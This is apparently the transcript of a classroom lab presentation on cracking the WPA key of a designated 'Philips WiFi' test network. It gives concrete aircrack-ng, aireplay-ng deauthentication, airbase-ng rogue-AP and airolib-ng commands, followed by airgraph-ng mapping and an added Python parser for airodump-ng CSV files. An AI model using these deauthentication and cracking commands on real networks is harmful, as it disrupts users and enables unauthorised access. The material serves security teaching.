
Practical stuff

Learn how to crack the WPA key of a Philips WiFi network with detailed steps, tips, and tools provided. From capturing the handshake to cracking the password, this practical guide covers it all. CD with essential files included.



Presentation Transcript


  1. Practical stuff
  • Crack the WPA key of this laptop.
  • SSID: « Philips WiFi »
  • Password list and cowpatty table available on CD (only useful today).

  2. Practical stuff - Tips
  • Make sure to disable all network managers and other programs using wireless interfaces: airmon-ng check kill
  • Madwifi-ng: airmon-ng stop ath0, then airmon-ng start wifi0
  • If you don't see the handshake with aircrack-ng (or any other tool), open your capture file with wireshark and filter it with « eapol ».

  3. Steps
  • Get the handshake
    • With the AP
    • Without the AP
  • Create airolib-ng database
  • Crack the handshake

  4. Get the handshake – With AP
  • Start airodump-ng to find the channel of the AP: airodump-ng INTERFACE
  • Make sure a client is connected. If there are none, you won't be able to get the handshake.
  • When you have the channel, stop the previous instance (Ctrl-C) and start it again on the channel of the AP (and save packets): airodump-ng -c AP_CHANNEL -w philips-capture INTERFACE
  • Open a new terminal and deauthenticate the client: aireplay-ng --deauth 1 -a BSSID -c CLIENT_MAC INTERFACE
  • If you didn't get it, try again without specifying the client MAC (some drivers prefer broadcast deauth): aireplay-ng --deauth 1 -a BSSID INTERFACE

  5. Get the handshake – Without AP
  • Start airbase-ng
    • WPA-PSK (TKIP)
    • SSID: Philips WiFi
    • Do not answer any other probe request
    • Channel 6
    • Save packets into philips-capture
  airbase-ng -z 2 -W 1 -e "Philips WiFi" -y -c 6 -F philips-capture rausb0
  Notes:
  • I'll do this; everybody doing it at once may not give the expected result :)
  • However, you can start airodump-ng on channel 6: airodump-ng -c 6 -w philips-capture INTERFACE
  • A bug in madwifi-ng prevents it from working correctly with airbase-ng.

  6. Creating airolib-ng database
  • Since a cowpatty table already exists, we'll use it with airolib-ng:
    • Output database: philips_airolib
    • Import cowpatty file "Philips WiFi"
  airolib-ng philips_airolib --import cowpatty "Philips WiFi"

  7. Crack the handshake
  • Use aircrack-ng to crack the key:
    • Capture file: philips-capture-01.cap
    • Using airolib-ng database: aircrack-ng -r philips_airolib philips-capture-01.cap
    • Using a wordlist: aircrack-ng -w passphrases.txt philips-capture-01.cap

  8. Practical stuff - Airgraph-ng
  • Creates a picture of the wireless networks.
  • Whether you are a wardriver or just want to monitor your network, this is for you.

  9. Practical stuff - Airgraph-ng (2)

  10. Practical Stuff – Airgraph-ng (3)
  • Run airodump-ng with the parameters you want (however -w is mandatory to make it work).
  • Airodump-ng writes the CSV file every 5 seconds.
  • Whenever you want, start airgraph-ng on the CSV file.

  11. Practical stuff - Airgraph-ng (4)
  • Parameters:
    • Input file: Airodump-ng CSV file (.txt)
    • Graph type:
      • CAPR (Client – AP Relationship): Connected clients
      • CPG (Common Probe Graph): Probed SSIDs
    • Output file: Picture file name
  • Examples:
    • CAPR: airgraph-ng.py -i ../airgraph-01.txt -t CAPR -o ../airgraph-capr.png
    • CPG: airgraph-ng.py -i ../airgraph-01.txt -t CPG -o ../airgraph-cpg.png
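As an added example (not part of the presentation or of the aircrack-ng project), the following Python reads an airodump-ng CSV file and builds the same two views airgraph-ng draws, CAPR (which clients are associated with which AP) and CPG (which SSIDs each client probes for), which is what you want when monitoring your own network. The column layout is assumed from airodump-ng's CSV output, and the sample file is constructed with made-up MAC addresses.

```python
import csv
from collections import defaultdict

# Constructed sample in the two-section layout airodump-ng writes with -w
# (access points first, then stations); every MAC address here is made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 6, 54, WPA, TKIP, PSK, -40, 120, 0, 0.0.0.0, 12, Philips WiFi,
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, OPN, , , -70, 30, 0, 0.0.0.0, 5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:AA:AA:AA:AA:01, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50, 200, 00:11:22:33:44:55, Philips WiFi
AA:AA:AA:AA:AA:02, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -60, 10, (not associated), Philips WiFi,HomeNet
"""

def parse_airodump_csv(text):
    """Return ({bssid: ap_info}, [station_info]) from airodump-ng CSV text."""
    aps, stations, section = {}, [], None
    for row in csv.reader(text.splitlines()):
        cells = [c.strip() for c in row]
        if not any(cells):
            continue  # blank separator line
        if cells[0] in ("BSSID", "Station MAC"):
            section = cells[0]  # header line starts a new section
            continue
        if section == "BSSID" and len(cells) >= 14:
            aps[cells[0]] = {"channel": cells[3], "privacy": cells[5], "essid": cells[13]}
        elif section == "Station MAC" and len(cells) >= 6:
            # probed ESSIDs are comma-separated, so they spill into extra cells
            probes = [p for p in cells[6:] if p]
            stations.append({"mac": cells[0], "bssid": cells[5], "probes": probes})
    return aps, stations

def client_ap_relationships(aps, stations):
    """CAPR view: associated clients grouped by the ESSID of their AP."""
    capr = defaultdict(list)
    for st in stations:
        if st["bssid"] in aps:  # drops "(not associated)" stations
            capr[aps[st["bssid"]]["essid"]].append(st["mac"])
    return dict(capr)

def common_probe_graph(stations):
    """CPG view: client MACs grouped by the SSID they probed for."""
    cpg = defaultdict(list)
    for st in stations:
        for essid in st["probes"]:
            cpg[essid].append(st["mac"])
    return dict(cpg)
```

A client that probes for an SSID you do not operate (HomeNet in the sample) shows up only in the CPG view, which is the quickest way to spot devices on your premises that are still looking for other networks.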
